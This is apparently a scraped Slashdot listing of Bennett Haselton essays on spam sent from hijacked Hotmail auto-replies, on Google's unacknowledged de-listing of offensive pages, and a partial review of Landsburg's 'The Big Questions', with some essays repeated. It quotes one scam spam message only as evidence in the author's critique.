    So this is basically what's happening, but it still leaves some unanswered questions, such as: Why Hotmail accounts, but not Yahoo Mail, GMail, or AOL accounts? I've never noticed any auto-reply spam sent from any accounts at any of those other services. Whatever the spammers did to gain control of so many Hotmail accounts, if it was profitable for them, why didn't they do the same thing for Yahoo Mail? And, why did only one spammer do this? If they're sending between 1 and 10 million spams per day for free, they're probably making money at it. Whatever they did to hack those accounts, why wouldn't other spammers figure out the same method and copy them?

    Presumably the Chinese spammers stole large numbers of passwords from Hotmail users either via a huge phishing attack, or through a security hole in Hotmail or some other part of the Windows Live service. If it was done via a security hole in Hotmail that the spammers discovered, then that would explain why the spammer's methods only worked for Hotmail accounts, and also why no other spammers have copied their techniques. (A phishing attack, on the other hand, would be easy to modify for other webmail services, and would also be easy for other spammers to emulate, so that's not consistent with the observed evidence so far.) I also found this post from blogger Stuart Shelton describing how his account was hacked by Chinese spammers -- and from the blog post, it's clear that he's very tech-savvy and would have been unlikely to fall for a run-of-the-mill password phish. If the attack happened even to people who know what they're doing, that seems to make the security hole explanation more likely.

    Perhaps others can come up with some theories about what happened. It's easy to come up with guesses, but the hard part is to reconcile them with the fact that it has only affected Hotmail users so far, and no other spammer seems to have figured out how to copy the same technique yet.

    But there's a much simpler question too: Why doesn't Microsoft just turn off the auto-replies for these users' accounts? They can query to see exactly which users have these messages in their auto-replies, and then un-set the auto-reply automatically. Yes, I know that even for a simple database operation like that, there's always more to it when you're managing hundreds of millions of accounts across multiple servers -- but if it will stop this one sender from sending between 50 million and 500 million spams (that in many cases will bypass people's spam filters) from Hotmail's servers in the coming year, isn't it probably worth it?

    And even if it wasn't a phishing attack this time, sooner or later some other spammer will probably capture tens or hundreds of thousands of Hotmail accounts using a phish or some other method, and try spamming through auto-replies as well. So if Hotmail "fixes" this batch of auto-reply spam for practice, then the next time it happens, they'll know exactly what to do to take care of it.

    I've written some columns where I strongly believed every word but expected a lot of opposition, some where I wasn't sure if I was right and just wanted to see what people thought, and . But I rarely argue something that I think is a no-brainer. Hotmail should un-set the auto-replies for those users whose accounts are spamming for nonexistent Chinese electronics knockoffs, before those accounts send another several hundred million spams in the coming year. Am I smoking crack?

    Then again, maybe expectations for Hotmail shouldn't be set too high. I use SpeakEasy for my mail provider, and on about November 19th I found that all messages sent to hotmail.com addresses from SpeakEasy's servers were being bounced with an error message rejecting them for "spam-like characteristics."I called SpeakEasy and they confirmed that they knew Hotmail was blocking all mail from their users (although for "security reasons," SpeakEasy couldn't tell me what they were trying to do about it). The block wasn't lifted until about November 28th, when my messages started getting through again.

    If SpeakEasy, which has been in business for 15 years, has annual revenues of $60 million, and was bought in 2007 by Best Buy, can't even get through to Microsoft in less than 10 days to tell them to stop blocking all mail from their servers, then Microsoft should first fix their postmaster trouble ticket system, so that people are not blocked from writing to their friends and family members at Hotmail for a week and a half. Then get to work on the spam auto-responders.

  18. Hotmailers Hawking Hoax Hunan Half-Offs

    Tech · Spam · · posted by kdawson · from the how-horrific dept. · 135 comments
    Frequent Slashdot contributor Bennett Haselton writes "An estimated 200,000 Hotmail users currently have their auto-reply set to a message spamming an advertisement for Chinese scam websites, which sell "discounted" electronics. Presumably the spammers compromised a large number of Hotmail accounts to pull this off, but wouldn't it be pretty easy for Hotmail to query for which users have that set as their auto-reply, and turn the auto-reply off for them?" Read below for Bennett's thoughts.

    After a recent mailing that I sent out to a subset of my proxy mailing list, I got back 18 auto-replies from Hotmail users, all substantially similar to this:

    Dear friend:
    We are an electronic products wholesale .Our products are of high quality and low price. If you want to do business , we can offer you the most reasonable discount to make you get more profits. We are expecting for your business.

    Please visit our website: www.wedosale.com

    Email: wedosale@vip.188.com .
    MSN: wedosale@hotmail.com .

    Looking forward to your contact and long cooperation with us!

    Our mainly products such the phones, PSP, display TV, notebook, video, computers, Mp4, GPS, xbox 360, digital cameras and so on.

    Welcome to visit our website!

    Some of the spam auto-replies advertised different websites, and the wording varied between the different auto-responses, but they were all similar advertisements for Chinese electronics "retailers." (And so, I assume, the websites are all fronts for the same company -- if multiple spammers had independently hacked Hotmail users' accounts to set their auto-replies, it would be vanishingly unlikely that those spammers would all happen to be electronics hawkers.) This was from a mailing that I sent to a set of subscribers that included about 26,000 users with "hotmail.com" e-mail addresses. If 18 out of 26,000 users in my sample have had their accounts hacked to send spam auto-replies, then this must be happening to a large number of Hotmail users -- not a large proportion (only one in 1,500, in my sample), but with about 300 million Hotmail users, that would still be a large absolute number.

    The same spammers have apparently been spamming through Hotmail auto-replies for at least 11 months, according to this post in the Windows Live Help community forum from January 2009. At first, some pundits seemed to have assumed that spammers had created these accounts themselves and subscribed the accounts to people's lists, in order to spam the list owners (and, if it's a list that accepts subscriber posts, broadcast the spam to the other list readers). However, looking at the addresses in my proxy mailing list that were sending the spam auto-replies, I noticed that (1) our records show that the auto-reply-spamming subscribers joined the mailing list by various means, signing up through different Circumventor websites, not indicative of how a spammer would have joined the list by automated means, and (2) many of their email addresses are associated with legitimate-looking Myspace and Facebook accounts. Thus it looks as if these were real users who joined the list legitimately, and then got their accounts hacked by the spammers, who set those users' accounts to send the spam as an auto-response.

    (If you happened to look at the spammers' www.wedosale.com website, at this point you might be thinking: I don't want to give money to spammers, but can I really get a Blackberry for only $295? Couldn't I just order from the website, and then if the goods don't show up or they're not as advertised, I can dispute the charge on my credit card? Well, I signed up for a dummy account on the www.wedosale.com page and got as far as the order page, and the only payment types that they accept are wire transfer, Western Union, and Moneygram -- precisely those types where you cannot get the money back or dispute fraudulent charges. If you've already gone and ordered a Blackberry, don't hold your breath.)

    If my 26,000 users were a representative sample of the 300 million current Hotmail users, then with 1 out of 1,500 users in my sample being "infected," I could estimate that about 200,000 Hotmail users (1/1500 times 300 million) are currently set to send spam auto-replies. Hotmail claims to process 3 billion non-spam e-mails per day, for an average of about 10 non-spam e-mails per Hotmail user. That's the average for all users; what's the average for the infected users? Some factors would tend to lead to a lower average for infected users -- if they have lots of friends sending them mail, it's more likely that one of their friends would have told them about the auto-reply spam and told them to turn it off, so perhaps the users still sending the spams are the ones who don't receive a lot of messages from their friends. On the other hand, some of the infected accounts may be receiving more (non-spam) e-mail than average; one reason people sometimes abandon webmail accounts is that they're getting too much mail, even from newsletters like the Circumventor list that they had legitimately subscribed to. So, figuring that factors in both directions roughly cancel out, if each infected user is receiving the average number of 10 emails per day and sending 10 auto-reply spams in response, that's still a total of 2 million outgoing spams per day shilling for nonexistent Chinese iPhones.

    These are just back-of-the-envelope calculations, but even I'm overestimating by a whole order of magnitude, that's still 0.2 million auto-reply spams per day, or about 70 million spams that will be sent by this one company through Hotmail's servers in the coming year, if Hotmail doesn't stop it. (And closer to a billion spams in the coming year if I'm not overestimating.)

    And it's actually worse than that, because these spams are less likely than average to be filtered, since they're coming from Hotmail's servers. Normally you'd think that the content-based module of a spam filter would have no problem catching a message like the one at the top of this article, especially if millions of similar messages have been spewed out over the past year. However, messages from Hotmail's servers, regardless of content, are less likely to be blocked, since their network has a good reputation for sending little spam overall (due to measures such as requiring users to fill out a CAPTCHA when signing up, blocking each account from sending more than 500 messages per day, etc.). When I sent messages to the infected Hotmail users from my Gmail account, to see if the auto-responses would get through Gmail's spam filter, Gmail's blocked only half of the replies. When I mailed all the users again from my Hotmail account, the results were strange -- most of the users' accounts sent back no auto-reply at all, not even a reply that got routed to my junk folder. (Why would Hotmail accounts not send an auto-reply in response to a message from a Hotmail user? Please post if you have any idea what's going on there.) However, of the infected Hotmail accounts that did send a spam auto-reply, 100% of those auto-reply spams were delivered to my inbox. (Apparently, Hotmail's spam filter usually assumes that messages from other Hotmail users can't possibly be spam.) Only Yahoo Mail's spam filter, when I sent a test message to the infected users from my Yahoo Mail account, blocked all of the auto-replies as junk mail.

    For the infected users on my mailing list, I sent them a link to a set of instructions I'd written about how to set and un-set their Hotmail auto-reply and how to change their Hotmail password, with the hopes that they'd eventually see the message and follow the steps. 18 users rescued, 200,000 to go.

    So this is basically what's happening, but it still leaves some unanswered questions, such as: Why Hotmail accounts, but not Yahoo Mail, GMail, or AOL accounts? I've never noticed any auto-reply spam sent from any accounts at any of those other services. Whatever the spammers did to gain control of so many Hotmail accounts, if it was profitable for them, why didn't they do the same thing for Yahoo Mail? And, why did only one spammer do this? If they're sending between 1 and 10 million spams per day for free, they're probably making money at it. Whatever they did to hack those accounts, why wouldn't other spammers figure out the same method and copy them?

    Presumably the Chinese spammers stole large numbers of passwords from Hotmail users either via a huge phishing attack, or through a security hole in Hotmail or some other part of the Windows Live service. If it was done via a security hole in Hotmail that the spammers discovered, then that would explain why the spammer's methods only worked for Hotmail accounts, and also why no other spammers have copied their techniques. (A phishing attack, on the other hand, would be easy to modify for other webmail services, and would also be easy for other spammers to emulate, so that's not consistent with the observed evidence so far.) I also found this post from blogger Stuart Shelton describing how his account was hacked by Chinese spammers -- and from the blog post, it's clear that he's very tech-savvy and would have been unlikely to fall for a run-of-the-mill password phish. If the attack happened even to people who know what they're doing, that seems to make the security hole explanation more likely.

    Perhaps others can come up with some theories about what happened. It's easy to come up with guesses, but the hard part is to reconcile them with the fact that it has only affected Hotmail users so far, and no other spammer seems to have figured out how to copy the same technique yet.

    But there's a much simpler question too: Why doesn't Microsoft just turn off the auto-replies for these users' accounts? They can query to see exactly which users have these messages in their auto-replies, and then un-set the auto-reply automatically. Yes, I know that even for a simple database operation like that, there's always more to it when you're managing hundreds of millions of accounts across multiple servers -- but if it will stop this one sender from sending between 50 million and 500 million spams (that in many cases will bypass people's spam filters) from Hotmail's servers in the coming year, isn't it probably worth it?

    And even if it wasn't a phishing attack this time, sooner or later some other spammer will probably capture tens or hundreds of thousands of Hotmail accounts using a phish or some other method, and try spamming through auto-replies as well. So if Hotmail "fixes" this batch of auto-reply spam for practice, then the next time it happens, they'll know exactly what to do to take care of it.

    I've written some columns where I strongly believed every word but expected a lot of opposition, some where I wasn't sure if I was right and just wanted to see what people thought, and . But I rarely argue something that I think is a no-brainer. Hotmail should un-set the auto-replies for those users whose accounts are spamming for nonexistent Chinese electronics knockoffs, before those accounts send another several hundred million spams in the coming year. Am I smoking crack?

    Then again, maybe expectations for Hotmail shouldn't be set too high. I use SpeakEasy for my mail provider, and on about November 19th I found that all messages sent to hotmail.com addresses from SpeakEasy's servers were being bounced with an error message rejecting them for "spam-like characteristics."I called SpeakEasy and they confirmed that they knew Hotmail was blocking all mail from their users (although for "security reasons," SpeakEasy couldn't tell me what they were trying to do about it). The block wasn't lifted until about November 28th, when my messages started getting through again.

    If SpeakEasy, which has been in business for 15 years, has annual revenues of $60 million, and was bought in 2007 by Best Buy, can't even get through to Microsoft in less than 10 days to tell them to stop blocking all mail from their servers, then Microsoft should first fix their postmaster trouble ticket system, so that people are not blocked from writing to their friends and family members at Hotmail for a week and a half. Then get to work on the spam auto-responders.

  19. Yes, Google Does De-List Pages; But When?

    Yro · Google_Fb · · posted by kdawson · from the how-offensive-is-too-offensive dept. · 133 comments
    Frequent Slashdot contributor Bennett Haselton writes "Google finds itself inserting a disclaimer once again above some offensive search results. But the disclaimer still leads many to believe (incorrectly) that Google doesn't tamper with search results even in cases of 'harmful' or 'offensive' material. We know that Google has in fact de-listed some pages at the request of offended parties. What is their real policy on the issue?" Read on for Bennet's essay.

    In 2004, when Google users discovered that the top search result for the word "Jew" was the anti-semitic site Jew Watch, Google ran a disclaimer in the space usually reserved for ads, explaining that their results only reflected the reality of link counts on the Web, and that they did not endorse any Web sites which appeared at the top of their listings. Now the disclaimer has been dusted off again, as the top result on Google Images for "Michelle Obama" is a picture of a monkey's face with Michelle's hairdo. (Ironically, it looks as if the original image would have fallen out of the rankings, if it hadn't been for a follow-up blog post about the controversy, which itself now comes up as the first result.)

    I first heard about the controversy from Dennis Prager's column in which he takes a New York Times columnist to task, because the columnist complained about "racially offensive images of the first couple" that come up in Google searches. Prager was unable to find any examples from Googling "first couple" or "Michelle and Barack Obama pictures," so he concluded that the NYT columnist "wildly exaggerated, if not made up" his claims. I tried Google Image searches for "first couple," "Barack Obama," and some other terms, and I couldn't find anything controversial either. However, it only took 10 seconds to enter "first couple google images controversy" on the regular Google Web search and find multiple blog posts explaining what all the fuss was about. Back to Google 101 for Dennis.

    Many of the blog posts refer to Google's disclaimer about not tampering with search results. Those on one side are urging Google to make an exception and "fix" the results, while others sagely observe that Google just reflects reality, it doesn't create it.

    All of this punditry is starting from a premise that's wrong. Google has actually removed pages from their search results — not because the pages were illegal or because the webmasters were search engine spamming, but because of the page's "offensive" content. In the "Chester's Guide" incident, a councilman in Chester, England discovered that one of the search results for "chester guide" was a satirical page titled "Chester's guide to picking up little girls." Although the page itself was obviously just someone's idea of sick humor, a Chester city councilman (who admitted that he hadn't looked at the page, saying that the title told him everything he needed to know) urged Google to remove the page from their index. Google at first refused, but later manually blacklisted the page to prevent it from appearing in their search results.

    Whether or not you think this was the right decision, probably depends on what you think is the purpose of Google. If Google's purpose is to return the most useful results, then it made sense to remove the link, as Danny Sullivan of Search Engine Watch argued at the time, since it almost certainly was not a useful result for people searching for "Chester Guide." On the other hand, if the primary purpose of Google is to reflect the reality of what pages on the Web feature certain words most prominently (combined with all the other factors that Google weighs, of course), then the results shouldn't be altered.

    But more people should at least realize that it happened. The Google disclaimer doesn't precisely say that they never blacklist pages or modify search results ("Google reserves the right to address such requests individually"), but it seems to give most people the impression that that's the case. According to that crudest of Googling techniques for which novice searchers are so frequently lampooned, there appear to be about 400 times as many stories on the Web about the Google "Jew Watch" controversy (where Google stood their ground) as there are stores about the "Chester's Guide" incident (where Google caved).

    And Google-number-three Matt Cutts posted on his blog back in March explaining why Google does not remove "offensive" pages from search results; over a hundred comments followed, debating the pros and cons of the position, but none of them mentioned the Chester incident or any other case where Google actually had removed pages except as a result of a court order. One isolated comment from "Anonymous" said:

    This is not quite true. I know of at least one web site that was de-listed for containing illegal content and/or promoting illegal activity.

    which may or may not have been a reference to the Chester Guide incident. And that was it.

    Is this a lot of hay to be making over something that happened years ago? Well, for one thing, I doubt if it happened just once. Consider that the Chester Guide incident involved a public declaration of outrage by a city council, and a public statement from Google, and still hardly anyone knows that it ever happened. If other incidents occurred without those high-profile elements, it would be even harder to discover them now. We'll probably never know how many such incidents took place, unless someone sues Google (maybe the owner of a blacklisted website, or maybe the victim of a RipOffReport hatchet job wondering why that site hadn't been blacklisted long ago), subpoenas Google for a list of cases where pages were de-indexed, and publishes the list if it's not sealed by a court order.

    But whether it was one time or a handful, consider that political candidates like Arnold Schwarzenegger and Al Franken got asked during their campaigns about things they did 20 years earlier, and it's fair to ask a candidate about their past, because it's the same person standing in front of you now. Why did you do that? Have you stopped? Why?

    And in the big scheme of things, Google is probably more powerful than a single US senator or the governor of California. So, can't we ask? What are their real rules about page removal? Have those rules changed since the Chester's Guide controversy? Can they even tell us what their rules are, or do they consider it a trade secret?

    It is well known, of course, that Google censors some results in their search engines branded for different markets like China and even in liberal democracies like Germany. But nobody would call that a slippery slope towards censorship in the US version of Google, because the censorship in the Chinese and German versions is done at the behest of the governments there. On the other hand, Google does admit that they will de-index pages which include credit card numbers or social security numbers (which are all too easy to find on the Web). This might not seem like a controversial position, but even this act of voluntary self-censorship may be dipping their toe in the water further than it seems. Most people do consider their credit card information more private than their home address. But surely there are people like J.D. Salinger who less about the privacy of their credit card number (which is easily changeable) than their home address (which isn't). If someone finds Salinger's address and posts it on the Web, should Salinger be able to demand that Google de-index the page? Why should Google cater to the majority who want to keep their credit card number secret, but not to the minority who care more about keeping their address secret? Another commenter on Matt Cutts's blog post asked:

    "hi. I have a question. My mom 'googled' herself and it shows some of her medical problems. She wants/needs these pages removed from search engines."

    Again, why shouldn't that be considered at least as private as a credit card number?

    And finally, even Google's decision to display an "offensive results" disclaimer, for some results but not for others, raises the same "Where do you draw the line?" questions as the issue of page removal. The Michelle Obama monkey picture gets a disclaimer. But search for 'george w bush' and the first row includes a photoshopped (I think!) image of Bush flipping off the press. Does that warrant a disclaimer as well? (Maybe that's considered less unfair because, even though the picture is fake, it does depict something that actually happened.) The first image result for "bristol palin" is a photo of her engaged in underage drinking — a real photo, but probably unfair to call it the single most relevant photo of her on the Web.

    So while Google might consider credit cards and social security numbers and search engine spam to be on one side of a "bright line," and everything else is served up without alteration, I think the line is blurrier than that, for at least those three reasons: (a) credit cards and SSNs are less private than some other that things that Google serves up anyway; (b) Google has unambiguously removed some content that fell outside that bright line, as in the Chester's guide incident, and (c) they make other "slippery slope" judgment calls about search results all the time (as in the question of when to show the disclaimer). So I hope that Google someday comes out with a more complete answer to the question. What is their real policy on what they will remove? The Chester's guide incident — would they do that sort of thing if the same situation came up today, or have their rules changed? If they want to go really deep, then is there a general set of principles from which their rules follow — explaining why, for example, they treat credit card numbers as more private than sensitive medical information? (Google did not respond to my request for comment, either through official channels or the unofficial back channels of friends who work there.)

    I hope Google gives an answer some day. Even just to say, "It's a classified internal policy and that's all we're going to tell you." But once and for all, the answer is not "Google doesn't remove content just because it's 'offensive' or 'harmful.'"

    Meanwhile, a modest suggestion about the disclaimer displayed above the search results: Put it where people will actually see it, in a separate line below the ads, but above the search results. Right now the link to the disclaimer is displayed as one of three ads across the top, and people don't look at the ads. But hey, people do buy ads, so if you push the disclaimer down a bit where people will read it, you also free up space for 50% more ad revenue!

  20. Yes, Google Does De-List Pages; But When?

    Yro · Google_Fb · · posted by kdawson · from the how-offensive-is-too-offensive dept. · 133 comments
    Frequent Slashdot contributor Bennett Haselton writes "Google finds itself inserting a disclaimer once again above some offensive search results. But the disclaimer still leads many to believe (incorrectly) that Google doesn't tamper with search results even in cases of 'harmful' or 'offensive' material. We know that Google has in fact de-listed some pages at the request of offended parties. What is their real policy on the issue?" Read on for Bennet's essay.

    In 2004, when Google users discovered that the top search result for the word "Jew" was the anti-semitic site Jew Watch, Google ran a disclaimer in the space usually reserved for ads, explaining that their results only reflected the reality of link counts on the Web, and that they did not endorse any Web sites which appeared at the top of their listings. Now the disclaimer has been dusted off again, as the top result on Google Images for "Michelle Obama" is a picture of a monkey's face with Michelle's hairdo. (Ironically, it looks as if the original image would have fallen out of the rankings, if it hadn't been for a follow-up blog post about the controversy, which itself now comes up as the first result.)

    I first heard about the controversy from Dennis Prager's column in which he takes a New York Times columnist to task, because the columnist complained about "racially offensive images of the first couple" that come up in Google searches. Prager was unable to find any examples from Googling "first couple" or "Michelle and Barack Obama pictures," so he concluded that the NYT columnist "wildly exaggerated, if not made up" his claims. I tried Google Image searches for "first couple," "Barack Obama," and some other terms, and I couldn't find anything controversial either. However, it only took 10 seconds to enter "first couple google images controversy" on the regular Google Web search and find multiple blog posts explaining what all the fuss was about. Back to Google 101 for Dennis.

    Many of the blog posts refer to Google's disclaimer about not tampering with search results. Those on one side are urging Google to make an exception and "fix" the results, while others sagely observe that Google just reflects reality, it doesn't create it.

    All of this punditry is starting from a premise that's wrong. Google has actually removed pages from their search results — not because the pages were illegal or because the webmasters were search engine spamming, but because of the page's "offensive" content. In the "Chester's Guide" incident, a councilman in Chester, England discovered that one of the search results for "chester guide" was a satirical page titled "Chester's guide to picking up little girls." Although the page itself was obviously just someone's idea of sick humor, a Chester city councilman (who admitted that he hadn't looked at the page, saying that the title told him everything he needed to know) urged Google to remove the page from their index. Google at first refused, but later manually blacklisted the page to prevent it from appearing in their search results.

    Whether or not you think this was the right decision, probably depends on what you think is the purpose of Google. If Google's purpose is to return the most useful results, then it made sense to remove the link, as Danny Sullivan of Search Engine Watch argued at the time, since it almost certainly was not a useful result for people searching for "Chester Guide." On the other hand, if the primary purpose of Google is to reflect the reality of what pages on the Web feature certain words most prominently (combined with all the other factors that Google weighs, of course), then the results shouldn't be altered.

    But more people should at least realize that it happened. The Google disclaimer doesn't precisely say that they never blacklist pages or modify search results ("Google reserves the right to address such requests individually"), but it seems to give most people the impression that that's the case. According to that crudest of Googling techniques for which novice searchers are so frequently lampooned, there appear to be about 400 times as many stories on the Web about the Google "Jew Watch" controversy (where Google stood their ground) as there are stores about the "Chester's Guide" incident (where Google caved).

    And Google-number-three Matt Cutts posted on his blog back in March explaining why Google does not remove "offensive" pages from search results; over a hundred comments followed, debating the pros and cons of the position, but none of them mentioned the Chester incident or any other case where Google actually had removed pages except as a result of a court order. One isolated comment from "Anonymous" said:

    This is not quite true. I know of at least one web site that was de-listed for containing illegal content and/or promoting illegal activity.

    which may or may not have been a reference to the Chester Guide incident. And that was it.

    Is this a lot of hay to be making over something that happened years ago? Well, for one thing, I doubt if it happened just once. Consider that the Chester Guide incident involved a public declaration of outrage by a city council, and a public statement from Google, and still hardly anyone knows that it ever happened. If other incidents occurred without those high-profile elements, it would be even harder to discover them now. We'll probably never know how many such incidents took place, unless someone sues Google (maybe the owner of a blacklisted website, or maybe the victim of a RipOffReport hatchet job wondering why that site hadn't been blacklisted long ago), subpoenas Google for a list of cases where pages were de-indexed, and publishes the list if it's not sealed by a court order.

    But whether it was one time or a handful, consider that political candidates like Arnold Schwarzenegger and Al Franken got asked during their campaigns about things they did 20 years earlier, and it's fair to ask a candidate about their past, because it's the same person standing in front of you now. Why did you do that? Have you stopped? Why?

    And in the big scheme of things, Google is probably more powerful than a single US senator or the governor of California. So, can't we ask? What are their real rules about page removal? Have those rules changed since the Chester's Guide controversy? Can they even tell us what their rules are, or do they consider it a trade secret?

    It is well known, of course, that Google censors some results in their search engines branded for different markets like China and even in liberal democracies like Germany. But nobody would call that a slippery slope towards censorship in the US version of Google, because the censorship in the Chinese and German versions is done at the behest of the governments there. On the other hand, Google does admit that they will de-index pages which include credit card numbers or social security numbers (which are all too easy to find on the Web). This might not seem like a controversial position, but even this act of voluntary self-censorship may be dipping their toe in the water further than it seems. Most people do consider their credit card information more private than their home address. But surely there are people like J.D. Salinger who less about the privacy of their credit card number (which is easily changeable) than their home address (which isn't). If someone finds Salinger's address and posts it on the Web, should Salinger be able to demand that Google de-index the page? Why should Google cater to the majority who want to keep their credit card number secret, but not to the minority who care more about keeping their address secret? Another commenter on Matt Cutts's blog post asked:

    "hi. I have a question. My mom 'googled' herself and it shows some of her medical problems. She wants/needs these pages removed from search engines."

    Again, why shouldn't that be considered at least as private as a credit card number?

    And finally, even Google's decision to display an "offensive results" disclaimer, for some results but not for others, raises the same "Where do you draw the line?" questions as the issue of page removal. The Michelle Obama monkey picture gets a disclaimer. But search for 'george w bush' and the first row includes a photoshopped (I think!) image of Bush flipping off the press. Does that warrant a disclaimer as well? (Maybe that's considered less unfair because, even though the picture is fake, it does depict something that actually happened.) The first image result for "bristol palin" is a photo of her engaged in underage drinking — a real photo, but probably unfair to call it the single most relevant photo of her on the Web.

    So while Google might consider credit cards and social security numbers and search engine spam to be on one side of a "bright line," and everything else is served up without alteration, I think the line is blurrier than that, for at least those three reasons: (a) credit cards and SSNs are less private than some other that things that Google serves up anyway; (b) Google has unambiguously removed some content that fell outside that bright line, as in the Chester's guide incident, and (c) they make other "slippery slope" judgment calls about search results all the time (as in the question of when to show the disclaimer). So I hope that Google someday comes out with a more complete answer to the question. What is their real policy on what they will remove? The Chester's guide incident — would they do that sort of thing if the same situation came up today, or have their rules changed? If they want to go really deep, then is there a general set of principles from which their rules follow — explaining why, for example, they treat credit card numbers as more private than sensitive medical information? (Google did not respond to my request for comment, either through official channels or the unofficial back channels of friends who work there.)

    I hope Google gives an answer some day. Even just to say, "It's a classified internal policy and that's all we're going to tell you." But once and for all, the answer is not "Google doesn't remove content just because it's 'offensive' or 'harmful.'"

    Meanwhile, a modest suggestion about the disclaimer displayed above the search results: Put it where people will actually see it, in a separate line below the ads, but above the search results. Right now the link to the disclaimer is displayed as one of three ads across the top, and people don't look at the ads. But hey, people do buy ads, so if you push the disclaimer down a bit where people will read it, you also free up space for 50% more ad revenue!

  21. The Big Questions

    News · · posted by samzenpus · from the read-all-about-it dept. · 229 comments
    Frequent Slashdot contributor Bennett Haselton changes things up today by reviewing The Big Questions: Tackling the Problems of Philosophy with Ideas from Mathematics, Economics and Physics. Questions that big need a big review and you can learn what Bennett has to say about it all by reading below. The Big Questions: Tackling the Problems of Philosophy with Ideas from Mathematics, Economics and Physics author Steven E. Landsburg pages 288 pages publisher Free Press rating 8/10 reviewer Bennett Haselton ISBN 978-1439148211 summary Steven Landsburg uses concepts from mathematics, economics, and physics to address the big questions in philosophy The first thing that I have to admit as a reviewer is that I enjoyed the book -- not just reading it, but scribbling out pages of scratch paper working on the puzzles inspired by the book -- that I probably would have paid up to about $200 for it (despite the fact that I disagreed with many of the conclusions, and even thought some of the arguments were pretty weak). I certainly don't mean that it's better than books by Richard Dawkins, Daniel Dennett, Steven Pinker, Malcolm Gladwell, or Steven Levitt and Steven Dubner (the Freakonomics and SuperFreakonomics team), but it will appeal to many of the same people.

    Those authors' books typically marshall a large amount of research data and evidence in support of a thesis that seems contrarian but turns out to be probably true. The Big Questions (released November 3rd with a companion website and blog doesn't do that. The book is divided into many self-contained vignettes and side topics and independent arguments, which are based more on logic and reasoning than externally gathered evidence, and the arguments don't always convince you of the conclusions. But that's part of the fun: many of the arguments in the book are structured so rigorously, almost like mathematical proofs, that if you disagree the conclusion, the challenge is to figure out why you think the conclusion is wrong. (Nobody ever scribbled equations in the margins of Malcolm Gladwell's books trying to figure out if he was "right".)

    You'll probably enjoy the book the most if the following are true for you:
    • You enjoyed math all the way through high school, especially the paradoxes that seemed to grow out of elementary rules of logic or probability. Sometimes the paradoxes resulted from a flaw in one of the reasoning steps, so that identifying the flaw led to a deeper understanding of how to conduct those steps. And sometimes there really is no flaw in the reasoning, so that the conclusion, no matter how counterintuitive, must be true.
    • Eventually, though, you ran out of "paradoxes" that could be described in the language of intermediate mathematics. There are other paradoxes lurking in mathematics, of course (like the celebrated Banach-Tarski paradox), but most of them require you to learn so much mathematics just to understand the paradox, that there aren't enough hours in the day.
    • So, you'd be delighted to discover paradoxes in an entirely new field, where arguments built from elementary rules of logic, lead to a conclusion that seems at first to make no sense, but leads to a deeper understanding the more you think about it.

    The core philosophy of The Big Questions -- not embodying any of the conclusions, but rather the rules of the game by which those conclusions should be reached -- is expressed in two lines near the end:

    If you're objecting to a logical argument, try asking yourself exactly which line in that argument you're objecting to. If you can't identify the locus of your disagreement, you're probably just blathering.

    (This quote makes Landsburg sound grumpier than he is; at this point in the book, he's just coming off of describing an exhausting round of e-mail argument with another professor who he felt was not playing by these rules.) I've believed this passionately for a long time, and to me it seems trivially true anyway: If an argument is organized into a series of steps, and you disagree with the conclusion, then some step in the argument must be the first step you disagree with, and if the author feels like each step in their argument follows by airtight logic from the previous step, then that's the point at which one of the two players is wrong. There's nothing more exasperating to me than writing what I think is a well-reasoned logical argument, sending it to the intended audience, and getting back a reply which makes it obvious that the recipient simply read my conclusion, disagreed with it, cleared their throat, and started typing out paragraphs describing their own view. Which they're entitled to, but they missed the point -- I was hoping that if they disagreed with my argument, they could pinpoint exactly what part they disagreed with. (If they had replied with their own argument structured like a sequence of logical steps, then that would at least be a tit-for-tat exchange, but that rarely happens -- people who believe in forming their arguments like rigorous proofs, usually also like to find the error in logical arguments that lead to the opposite conclusion.)

    To give you some of the flavor: One chapter in The Big Questions contains an elegant argument against protectionist tariffs: Suppose that an American sells cameras for $80 but a foreigner wants to sell cameras in America for $60 apiece. An American who would have bought the $80 camera will now buy the $60 camera and hence is better off by $20. The seller now has to sell their own cameras for $60 to stay competitive, so they are worse off by at most $20 -- however, if they voluntarily switch to some other business, then they'll be better off than they were when they were selling cameras for $60, and therefore worse off by some amount less than $20 from their original position. So on balance, abolishing protectionist tariffs would be good for Americans. "Therefore," writes Landsburg, "it seems to me that the protectionist's position is even less respectable than the creationist's. If you're convinced that most scientists are liars -- that everything they say about fossils, for example, is false -- then you can be a logically consistent creationist. But you can't be a logically consistent protectionist."

    But the best part of reading an argument like that is to try and come up with a counter-argument that is equally rigorous. I think Landsburg is right, but only insofar as it applies to benefits to Americans. That leaves out another part of the equation: whether the production of cheaper foreign goods is harmful to foreigners providing the cheap labor. The textbook answer from economic theory is that the factory jobs must make workers better off (or at least no worse off) than they were before, otherwise they wouldn't have taken the jobs voluntarily. On the other hand, conditions in overseas sweatshops are so notoriously dangerous and unpleasant that it seems hard to believe the opportunities leave workers better off on balance. So you could be a logically consistent protectionist if you believe that: (a) sweatshop workers systematically underestimate how much the factory jobs are harming them; and (b) the harm done to the workers outweighs the benefits of lower prices for Americans. I'm not sure if these statements are true, but they are logically consistent. Still, Landsburg's argument is about as concise as possible and seems to refute any argument that protectionism makes
    Americans better off on average.

    In another chapter, Landsburg discusses the recent atheist bestsellers such as Richard Dawkins's The God Delusion and suggests that these books are really directed against a non-existent enemy, because the evidence is quite strong that most adults do not really believe the tenets of any major religion anyway. There is the argument that "interfaith dialog" makes no sense if you really believe (as many major religions teach) that your own religion's tenets are settled beyond discussion. There is the argument that since economic theory consistently shows that people respond to threat of punishment, virtually no one behaves as if they actually believe in everlasting damnation after death as punishment for sin. And the fact that the voluntary martyrdom of suicide bombers is vastly more rare than most people believe, and a disproportionate number of those are children (as Landsburg says, "I do not deny that many children believe in God, just as I do not deny that many children believe in Santa Claus"). I'd wondered before about how many people really did believe in God, but in just a few pages this argument had me thinking that the number was a lot lower than I'd ever thought before.

    On the other hand, there were some arguments that I didn't spend much time puzzling over at all. Landsburg summarizes the paradox of "free will", and his dismissal of the paradox, basically as follows: The interactions of atoms that make up our brains and our environments, are deterministic processes, so if you know the state of a system at a given point in time, you could predict the state at any future point in time if you had enough computational power (with a caveat about the randomness possibly introduced by quantum physics). "Where, then, is there room for free will?... Easy: There is room for free will on Tuesday, Wednesday, Thursday and Friday, as the human being in question engages in deliberations that ultimately cause his actions." He says that just as "weather" is shorthand for the aggregate of the interactions of trillions of water molecules, "free will" is the same kind of shorthand:

